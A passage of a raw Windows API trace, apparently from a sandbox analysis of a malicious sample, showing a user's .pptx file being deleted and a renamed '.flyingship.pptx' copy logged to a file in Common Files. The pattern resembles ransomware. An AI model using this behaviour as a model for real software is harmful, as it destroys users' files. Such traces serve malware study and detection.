0x9bd528 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.203] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0171.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd528, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.204] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.204] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0xa7c0, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0xa7c0, lpOverlapped=0x0) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.206] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.207] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.207] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.207] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.207] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.207] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0171.207] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.207] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.209] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.209] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.209] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.209] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.209] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpFilePart=0x0) returned 0x3d [0171.211] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0xb67b9e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 0x90ae18 [0171.212] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k55l_7um1tyjpsga.pptx")) returned 1 [0171.217] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0xb67b9e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 0 [0171.217] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0171.217] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.218] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.218] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.218] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.218] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.219] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0171.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.219] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.220] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0171.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0171.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.220] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.220] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.220] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0171.220] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.221] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.221] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0171.221] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xea2, lpOverlapped=0x0) returned 1 [0171.221] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0171.221] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xea2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.221] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0171.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0171.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4b) returned 0x923b28 [0171.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\n", cchWideChar=75, lpMultiByteStr=0x923b28, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\n", lpUsedDefaultChar=0x0) returned 75 [0171.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0171.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0171.222] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4a, lpOverlapped=0x0) returned 1 [0171.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0171.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.222] CloseHandle (hObject=0x138) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0171.225] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0171.225] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0171.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.227] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0171.227] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.227] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, 